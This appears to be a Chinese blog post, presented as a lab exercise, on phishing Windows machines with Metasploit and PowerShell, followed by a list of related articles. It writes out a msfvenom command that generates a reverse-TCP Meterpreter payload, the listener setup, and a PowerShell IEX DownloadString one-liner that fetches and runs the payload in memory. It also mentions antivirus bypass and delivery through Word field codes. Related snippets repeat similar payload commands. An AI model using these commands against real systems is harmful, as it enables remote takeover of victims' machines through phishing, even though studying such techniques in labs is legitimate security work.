MSF&Powershell钓鱼攻击

最新推荐文章于 2024-09-19 20:22:04 发布
原创 最新推荐文章于 2024-09-19 20:22:04 发布 · 589 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#网络 #安全
本文介绍了如何使用MSF生成反弹shell的payload,并结合Powershell在Windows环境中进行钓鱼攻击。实验过程包括在Kali系统中创建payload,通过MSF监听,将payload上传至公网服务器,然后诱导目标机器通过Powershell下载并执行,最终实现远程控制靶机。

MSF&Powershell钓鱼攻击

前言

Powershell是windows下面非常强大的命令行工具,并且在windows中Powershell可以利用.NET Framework的强大功能,也可以调用windows API,在win7/server 2008以后,powershell已被集成在系统当中。 除此之外,使用powershell能很好的bypass各种AV,在渗透测试中可谓是一个神器。此次使用的是开源的powershell脚本集nishang中的client来制作钓鱼文件。其中office类型文件可以达到钓鱼目的的前提是office已经启用宏。

实验环境

实验步骤

0x01 在Kali中通过MSF生成反弹Payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1121 -f psh-reflection >x.ps1

#生成名为x.ps1的windows/x64/meteroreter/reverse_tcp的payload

在这里插入图片描述

0x02 通过MSF进行监听

msfconsole
use exploit/multi/handler
set lhost 192.168.3.223
set lport 1234
set payload windows/x64/meterpreter/reverse_tcp
run

在这里插入图片描述

0x03 将生成的payload放至公网服务器,确保靶机能够访问。

在这里插入图片描述

0x04 在靶机中运行powershell脚本,实战需要其他方式运行此代码:

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.221/x.ps1')

#代码中的地址为公网地址。通过word域代码执行powershell脚本调用web服务器payload

下载到靶机内存中执行

在这里插入图片描述

当靶机成功执行以上命令之后,msf会收到会话如下图,此时已经成功建立会话,可控制靶机。实验成功。

在这里插入图片描述

p01son
关注
ms10_002(极光漏洞)渗透步骤——MSF搭建钓鱼网站
渗透测试
06-07 2437
本文简单介绍了如何使用metasploit针对ms10_002(极光漏洞)进行渗透测试,仅供学习 测试环境 描述 ip 主机 kali2020 192.168.1.113 目标主机 win xp sp3 192.168.1.106 ①启动msf,搜索ms10_002,使用msf中的exploit攻击模块,设置参数 msf6 > search ms10_002 Matching Modules ================ # Name .
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 6701
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
一条命令上线MSF(Metasploit)-web_delivery模块
10-31 3444
一条命令上线MSF(Metasploit)-web_delivery模块
上线MSF(Metasploit)的几种常见方式
热门推荐
qq_46258964的博客
04-14 1万+
powershell上线 利用powershell上线msf 对应模块use exploit/multi/script/web_delivery use exploit/multi/script/web_delivery set target 2 set payload windows/x64/meterpreter/reverse_tcp set lhost 172.16.1.10 set lport 6666 run 复制对应的powershell代码到Windows主机中执行便可以上线msf m
set+MSF进行网站钓鱼
道长道长的博客
09-25 419
SET最常用的攻击方法有:用恶意附件对目标进行 E-mail 钓鱼攻击、Java Applet攻击、基于浏览器的漏洞攻击、收集网站认证信息、建立感染的便携媒体、邮件群发等攻击手段。本文将演示如何借助 SET+MSF 渗透工具对 Win 11 靶机进行网络钓鱼(欺骗用户的账号密码)。
Kali Linux—借助 SET+MSF 进行网络钓鱼、生成木马、获主机shell、权限提升、远程监控、钓鱼邮件等完整渗透测试(二)
weixin_72849553的博客
12-24 2920
将 Win 7靶机上的后门脚本、注册表注册项清除,Kali 攻击机则无法再随意入侵 Win 7 虚拟机靶机了,如下图所示:以上通过 SET + MSF 渗透工具,演示了如何生成木马、获得主机Shell、主机提权、远程桌面控制、日志清除、后门植入等完整的一次渗透测试攻击
Metasploit Framework(MSF)
weixin_61899124的博客
06-19 663
是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。​包含了一些辅助功能的模块,如扫描、信息收集等。
MSF的使用学习
最新发布
2302_80097039的博客
09-19 2614
更新安装包信息;只检查,不更新(已安装的软件包是否有可用的更新,给出汇总报告)# 更新已安装的软件包,不删除旧包;# 升级包,删除旧包二、使用方法使用方法:1. 基础使用:#进入框架# 使用search命令查找相关漏洞# 使用use进入模块#使用info查看模块信息#设置攻击载荷#查看模块需要配置的参数#设置参数#攻击后渗透阶段 #后渗透阶段。
xss——flash钓鱼 (kali MSF捆绑钓鱼)超详细!小白也可以!
qq_48368964的博客
07-23 2466
kali系统虚拟机(攻击者监听设备、制作木马),Win10物理机(受害者目标主机),winrar压缩软件(用于伪装木马),phpstudy(搭建模拟钓鱼网站)
红队简单钓鱼实战---office宏
LvHLong的博客
05-30 1850
前言 本文发布已获得本人授权 ,本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 一、office宏介绍 宏是微软公司为其OFFICE软件包设计的一个特殊功能,软件设计者为了让人们在使用软件进行工作时,避免一再地重复相同的动作而设计出来的一种工具,它利用简单的语法,把常用的动作写成宏,当在工作时,就可以直接利用事先编好的宏自动运行,去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。 宏病毒是一种常见的计算机病毒,......
MSF&Powershell进行钓鱼攻击
weixin_44508748的博客
04-26 2780
一、Powershell配合MSF无文件攻击 实验环境: 靶机:win 7 >192.168.1.9 攻击机:kali>192.168.1.7 web服务器:win 10 > 192.168.1.6 本次实验的大致过程如下: MSF生成payload并放到靶机能够访问的服务器上,攻击者通过钓鱼等方式使靶机执行powershell代码,靶机反弹到msf监听的端口上建立会话,由此攻击...
PowerShell攻击指南
鸡蛋炒鸡蛋
03-03 7202
什么是powershell?可以简单理解为cmd.exe的扩展。powershell具有灵活性和功能化管理windows系统的能力,powershell脚本文件后缀名是.ps1(数字1)Windows PowerShell是一种命令行外壳程序和脚本环境,它内置在每个受支持的windows版本中,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。
xss-flash钓鱼配合msf捆绑上线
weixin_43225966的博客
04-21 1242
xss-flash钓鱼配合msf捆绑上线
利用CVE-2021-40444漏洞钓鱼执法上线MSF
include_voidmain的博客
03-31 3557
0x01 漏洞描述 2021年9月8日,微软官方发布了关于MSHTML组件的风险通告(漏洞编号:CVE-2021-40444),未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。 Microsoft 发现,存在尝试通过特别设计的 Microsoft Office 文档利用此漏洞的针对性攻击攻击者可制作一个由托管浏览器呈现引擎的 Microsoft Office 文档使用的恶意 ActiveX 控件。然后,攻击者必须诱使用户打开此恶意文件。 0x02 漏洞
攻击演练:DNS劫持+钓鱼网站+msf免杀
weixin_49182737的博客
05-26 200
攻击演练:DNS劫持+钓鱼网站+msf免杀 遵守《中华人民共和国网络安全法》,共创良好网络环境
day11 MSF(一)
hellodaoyan的博客
12-06 222
payload 成品shellcode 半成品 需要服务器环境配好-f exe-e编码变型起到免杀的作用-a 指定位数 x86 32位 x86_64 位 不指都是32位 以后说怎么指定什么位-platform 是指定linux , windows-b也是干扰杀毒软件-i 指定几次 多了可能就坏了-c 注入到一个文件剩下的自己看图。
Powershell配合word伪装木马执行
洋洋的小黑屋
03-17 499
环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 ​ 放到VPS上,这里我们放到本机搭建的apache环境中 ​ win7中访问木马是否成功 ​ 打开wo...
Powershell 配合msf无文件攻击
洋洋的小黑屋
04-27 1909
生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1121 -f psh-reflection >x.ps1 放到VPS上,这里我们放到本机搭建的apache环境中 kali设置监听,并且启动 win7中访问木马是否成功 直接在win7的cmd中执行命令 powersh...
PowerShell脚本写的文件.ps1文件介绍
qq_19396231的博客
02-22 5058
.ps1文件是PowerShell写好的脚本文件。在Windows系统中,默认情况下是不允许执行.ps1文件的,那么怎么才能让系统允许执行.ps1文件呢? 什么是“.ps1”文件? 这个是PowerShell写的脚本文本,你可以在记事本中写一段PowerShell代码,然后将其保存为“xxx.ps1”,后面要使用它的时候,双击即可运行了。这有点像批处理的“.bat”文件,也有点像VBScri...
生命在于学习——MSF初体验(三)
易水哲的博客
10-27 1820
MSF的笔记记录(三)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值